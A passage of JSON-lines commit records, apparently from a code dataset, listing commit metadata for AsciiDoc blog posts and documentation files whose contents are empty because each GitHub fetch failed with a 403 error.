'https:\/\/github.com\/garethahealy\/dozer.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"771313fe12d31e83bcaf3fbf60aed58047780c39","subject":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","message":"Update 2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_file":"_posts\/2017-05-12-Phantom-J-S-on-Raspberry-Pi-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aff1299f9a841f673f16e7091584bc001b446918","subject":"Update 2017-06-21-Creating-screencasts-on-Linux.adoc","message":"Update 2017-06-21-Creating-screencasts-on-Linux.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-06-21-Creating-screencasts-on-Linux.adoc","new_file":"_posts\/2017-06-21-Creating-screencasts-on-Linux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2706a9f45c45a3ae193c7ac57220b6fb544a0578","subject":"Gepubliceerd op 2016-02-16","message":"Gepubliceerd op 2016-02-16","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_file":"_posts\/2016-02-16-Netter-coden-door-Java-8-Interfaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa430a38ac0cd3baca96b5b7acbcd5b019696e06","subject":"Update 2017-03-20-Elso-bejegyzes.adoc","message":"Update 2017-03-20-Elso-bejegyzes.adoc","repos":"bencekiraly\/bencekiraly.github.io,bencekiraly\/bencekiraly.github.io,bencekiraly\/bencekiraly.github.io,bencekiraly\/bencekiraly.github.io","old_file":"_posts\/2017-03-20-Elso-bejegyzes.adoc","new_file":"_posts\/2017-03-20-Elso-bejegyzes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bencekiraly\/bencekiraly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b700987fbf872ea3f27c9119b964b9daf4426890","subject":"Worked on documentation.","message":"Worked on documentation.\n","repos":"libyal\/dtfabric,libyal\/dtfabric","old_file":"documentation\/Data types fabric (dtFabric) format.asciidoc","new_file":"documentation\/Data types fabric (dtFabric) format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtfabric.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"302ac4871447b768d350cac973560befb017c485","subject":"Add docs for creating and testing function invokers","message":"Add docs for creating and testing function 
invokers\n","repos":"markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s","old_file":"Function-Invokers.adoc","new_file":"Function-Invokers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markfisher\/sk8s.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e25a76a6fcdbcf8898dea41de12d1d54ff66b60b","subject":"\u00c9nonc\u00e9 branching","message":"\u00c9nonc\u00e9 branching\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Git branching.adoc","new_file":"Git\/Git branching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa7e2fb6603168d42064184c7b56a9c24062adc6","subject":"Update 2017-01-17-Project-Airspace.adoc","message":"Update 2017-01-17-Project-Airspace.adoc","repos":"Imran31\/imran31.github.io","old_file":"_posts\/2017-01-17-Project-Airspace.adoc","new_file":"_posts\/2017-01-17-Project-Airspace.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Imran31\/imran31.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83d35eb89a020c2bddad617bf4ff89b348d377f1","subject":"Update 2018-03-23-E-C2-Spring-Boot.adoc","message":"Update 2018-03-23-E-C2-Spring-Boot.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-23-E-C2-Spring-Boot.adoc","new_file":"_posts\/2018-03-23-E-C2-Spring-Boot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09e56d880d9e2dfe55f625030f26b3631a570f8b","subject":"Update 2015-11-08-Ihr-seid-gefragt.adoc","message":"Update 2015-11-08-Ihr-seid-gefragt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-11-08-Ihr-seid-gefragt.adoc","new_file":"_posts\/2015-11-08-Ihr-seid-gefragt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa2474fdf23fda1dad2c45fd6854876816ab2695","subject":"Update 2016-06-24-Kitchen-Sink.adoc","message":"Update 2016-06-24-Kitchen-Sink.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_file":"_posts\/2016-06-24-Kitchen-Sink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"659a6fcddcfc66a40f26a2dd321c88c90eac87f6","subject":"y2b create post New iPad Mini 2 \\","message":"y2b create post New iPad Mini 2 
\\","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-04-New-iPad-Mini-2-.adoc","new_file":"_posts\/2013-09-04-New-iPad-Mini-2-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5adb3d12141115ea77f1aa422e31be754e0394a1","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6623d6b5445624b505eba7c305e0ac93160f370","subject":"Update 1993-11-17.adoc","message":"Update 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"730619d4c1df8c3a50de046cb0258e2703424816","subject":"Update 2016-10-17.adoc","message":"Update 2016-10-17.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-17.adoc","new_file":"_posts\/2016-10-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25787eda684d6e4106a06442ab0a7c1d664a510b","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"elinep\/blog,elinep\/blog,elinep\/blog,elinep\/blog","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elinep\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65830be651080ee5d285171b2f1108876878e8ba","subject":"Update 2017-02-11-Drawatchio.adoc","message":"Update 2017-02-11-Drawatchio.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-11-Drawatchio.adoc","new_file":"_posts\/2017-02-11-Drawatchio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55759e9e5fbdf9775e72cf86cce82be1c16f60f8","subject":"Update javaee7-websocket-api-html5-en.adoc","message":"Update 
javaee7-websocket-api-html5-en.adoc","repos":"jthmiranda\/javaee7-websocket,jthmiranda\/javaee7-websocket,jthmiranda\/javaee7-websocket,mgreau\/javaee7-websocket,mgreau\/javaee7-websocket,mgreau\/javaee7-websocket","old_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_file":"doc\/javaee7-websocket-api-html5-en.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/javaee7-websocket.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"576c569a1778b4f6cfeb79399a161023e38e4acf","subject":"Add a code of conduct from contributor-covenant.org","message":"Add a code of conduct from contributor-covenant.org\n\nThis seems reasonable enough\n\nFixes #173\n","repos":"jamescway\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,MisumiRize\/jruby-gradle-plugin,raelik\/jruby-gradle-plugin,raelik\/jruby-gradle-plugin,raelik\/jruby-gradle-plugin,jamescway\/jruby-gradle-plugin","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raelik\/jruby-gradle-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34c186d38f752b6520cc2c8f2bffe6ebf86e3aea","subject":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","message":"Update 2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_file":"_posts\/2016-03-30-Full-Path-Disclosure-Veo-donde-estas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d671639c7db6a775f6273769a79e4bb651ca6bf","subject":"Create en\/SUMMARY.adoc","message":"Create en\/SUMMARY.adoc","repos":"reyman\/mageo-documentation,reyman\/mageo-documentation,reyman\/mageo-documentation","old_file":"en\/SUMMARY.adoc","new_file":"en\/SUMMARY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reyman\/mageo-documentation.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"25516868fe6f9beae8f66aaf3aef777a27644ef8","subject":"Correcting api name (#24924)","message":"Correcting api name (#24924)\n\nAs per REST request signature for reroute, API has no
underscore.","repos":"vroyer\/elasticassandra,vroyer\/elasticassandra,sneivandt\/elasticsearch,coding0011\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,mohit\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,LeoYao\/elasticsearch,umeshdangat\/elasticsearch,umeshdangat\/elasticsearch,naveenhooda2000\/elasticsearch,scottsom\/elasticsearch,s1monw\/elasticsearch,wenpos\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,sneivandt\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,wangtuo\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,wangtuo\/elasticsearch,coding0011\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,mjason3\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,gfyoung\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,nezirus\/elasticsearch,fred84\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra,s1monw\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,umeshdangat\/elasticsearch,wenpos\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,masaruh\/elasticsearch,naveenhooda2000\/elasticsearch,brandonkearby\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,markwalkom\/elasticsearch,nknize\/elasticsearch,fred84\/elasticsearch,mohit\/elasticsearch,wangtuo\/elasticsearch,lks21c\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,HonzaKral\/elasticsearch,naveenhooda2000\/elasticsearch,jimczi\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,shreejay\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,HonzaKral\/elasticsearch,shreejay\/elasticsearch,jimczi\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,markwalkom\/elasticsearch,GlenRSmith\/elasticsearch,fred84\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,nezirus\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,nknize\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,sneivandt\/elasticsearch,GlenRSmith\/elasticsearch,sneivandt\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,lks21c\/elasticsearch,maddin2016\/elasticsearch,vroyer\/elassandra,nknize\/elasticsearch,kalimatas\/elasticsearch,masaruh\/elasticsearch,robin13\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rajanm\/elasticsearch,s1monw\/elasticsearch,coding0011\/elasticsearch,markwalkom\/elasticsearch,mjason3\/
elasticsearch,qwerty4030\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jimczi\/elasticsearch,pozhidaevak\/elasticsearch,uschindler\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,scorpionvicky\/elasticsearch,rajanm\/elasticsearch,strapdata\/elassandra,markwalkom\/elasticsearch,nezirus\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch,naveenhooda2000\/elasticsearch,mohit\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elasticassandra,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,umeshdangat\/elasticsearch,GlenRSmith\/elasticsearch,nezirus\/elasticsearch,maddin2016\/elasticsearch,HonzaKral\/elasticsearch,lks21c\/elasticsearch,s1monw\/elasticsearch,LeoYao\/elasticsearch,nknize\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,brandonkearby\/elasticsearch,qwerty4030\/elasticsearch,nezirus\/elasticsearch,shreejay\/elasticsearch,naveenhooda2000\/elasticsearch,maddin2016\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch","old_file":"docs\/reference\/cluster\/reroute.asciidoc","new_file":"docs\/reference\/cluster\/reroute.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6b3956ac24c74637ef39e07035f4f1d48d37ff37","subject":"chore(Ch4): add deferred-promise to index","message":"chore(Ch4): add deferred-promise to index\n","repos":"sunfurong\/promise,liubin\/promises-book,purepennons\/promises-book,oToUC\/promises-book,liubin\/promises-book,genie88\/promises-book,azu\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,lidasong2014\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,oToUC\/promises-book,mzbac\/promises-book,azu\/promises-book,liubin\/promises-book,purepennons\/promises-book,cqricky\/promises-book,wenber\/promises-book,wangwei1237\/promises-book,azu\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,genie88\/promises-book,sunfurong\/promise,azu\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,charlenopires\/promises-book,charlenopires\/promises-book,cqricky\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,dieface\/promises-book,sunfurong\/promise,wenber\/promises-book,tangjinzhou\/promises-book,oToUC\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,purepennons\/promises-book,wangwei1237\/promises-book,liyunsheng\/promises-book,liyunsheng\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,wenber\/promises-book,liyunsheng\/promises-book","old_file":"Ch4_AdvancedPromises\/readme.adoc","new_file":"Ch4_AdvancedPromises\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0d1198bf1b099f58f3ce98f31d3fc13c93cd509","subject":"Delete README-original.adoc","message":"Delete README-original.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"README-original.adoc","new_file":"README-original.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71e277841f54127721279f8918445ee53e468eff","subject":"fixed \"has no volunteered\" typo","message":"fixed \"has no volunteered\" typo","repos":"slaskawi\/JGroups,ligzy\/JGroups,rpelisse\/JGroups,rhusar\/JGroups,belaban\/JGroups,vjuranek\/JGroups,pruivo\/JGroups,kedzie\/JGroups,Sanne\/JGroups,TarantulaTechnology\/JGroups,pruivo\/JGroups,dimbleby\/JGroups,deepnarsay\/JGroups,kedzie\/JGroups,vjuranek\/JGroups,rpelisse\/JGroups,pferraro\/JGroups,kedzie\/JGroups,danberindei\/JGroups,ligzy\/JGroups,pferraro\/JGroups,dimbleby\/JGroups,rhusar\/JGroups,Sanne\/JGroups,vjuranek\/JGroups,TarantulaTechnology\/JGroups,slaskawi\/JGroups,rpelisse\/JGroups,rhusar\/JGroups,belaban\/JGroups,dimbleby\/JGroups,Sanne\/JGroups,deepnarsay\/JGroups,ligzy\/JGroups,pferraro\/JGroups,pruivo\/JGroups,deepnarsay\/JGroups,danberindei\/JGroups,belaban\/JGroups,slaskawi\/JGroups,TarantulaTechnology\/JGroups,danberindei\/JGroups","old_file":"doc\/manual\/blocks.adoc","new_file":"doc\/manual\/blocks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pferraro\/JGroups.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"47eda8822032cc354eb186e1c238ad391e1fb4c3","subject":"Link diff GitHub","message":"Link diff GitHub\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"L3\/Exercices not\u00e9s.adoc","new_file":"L3\/Exercices not\u00e9s.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f978974bc656e883814d9d97bc11314cf082b9fa","subject":"Docs: Remove s3 repository integ test documentation (#26005)","message":"Docs: Remove s3 repository integ test documentation (#26005)\n\nThe s3 repository plugin has \"third party\" integ tests which rely\r\non external service and configuration setup. These tests are really\r\ninternal verification of the plugin (and should be moved to real integ\r\ntests). Running them is not something a user should do, and the\r\ndocumentation has been out of date for all of 5.x. 
This commit removes\r\nthe docs, removing potential confusion for users.","repos":"scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,markwalkom\/elasticsearch,mohit\/elasticsearch,qwerty4030\/elasticsearch,qwerty4030\/elasticsearch,sneivandt\/elasticsearch,scorpionvicky\/elasticsearch,wangtuo\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,mjason3\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,scottsom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nknize\/elasticsearch,Stacey-Gammon\/elasticsearch,fred84\/elasticsearch,lks21c\/elasticsearch,masaruh\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,markwalkom\/elasticsearch,fred84\/elasticsearch,maddin2016\/elasticsearch,mjason3\/elasticsearch,pozhidaevak\/elasticsearch,gfyoung\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,robin13\/elasticsearch,umeshdangat\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,brandonkearby\/elasticsearch,umeshdangat\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,wenpos\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,wenpos\/elasticsearch,brandonkearby\/elasticsearch,nknize\/elasticsearch,qwerty4030\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,HonzaKral\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,maddin2016\/elasticsearch,pozhidaevak\/elasticsearch,brandonkearby\/elasticsearch,rajanm\/elasticsearch,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,uschindler\/elasticsearch,umeshdangat\/elasticsearch,maddin2016\/elasticsearch,masaruh\/elasticsearch,fred84\/elasticsearch,mohit\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,mohit\/elasticsearch,gfyoung\/elasticsearch,maddin2016\/elasticsearch,lks21c\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,Stacey-Gammon\/elasticsearch,mohit\/elasticsearch,wangtuo\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,scorpionvicky\/elasticsearch,wangtuo\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,s1monw\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,markwalkom\/elasticsearch,qwerty4030\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,masaruh\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,sneiv
andt\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,wangtuo\/elasticsearch,lks21c\/elasticsearch,uschindler\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,brandonkearby\/elasticsearch,wangtuo\/elasticsearch,masaruh\/elasticsearch","old_file":"docs\/plugins\/repository-s3.asciidoc","new_file":"docs\/plugins\/repository-s3.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"907d98a990f1a7360ea0af979d7f821833801b21","subject":"Minor fixes in the rules of five\/zero","message":"Minor fixes in the rules of five\/zero\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d2099ec4dd6d436883e45931e41b5b24a46f504","subject":"docs update","message":"docs update\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"82881ef99abfa8243aa167786f7ba5530ce6effe","subject":"[DOCS] Fix typo in \"Cluster Health\" part (#20864)","message":"[DOCS] Fix typo in \"Cluster Health\" part (#20864)\n\nReplace \"we can see and total of ...\" by \"we can see a total of 
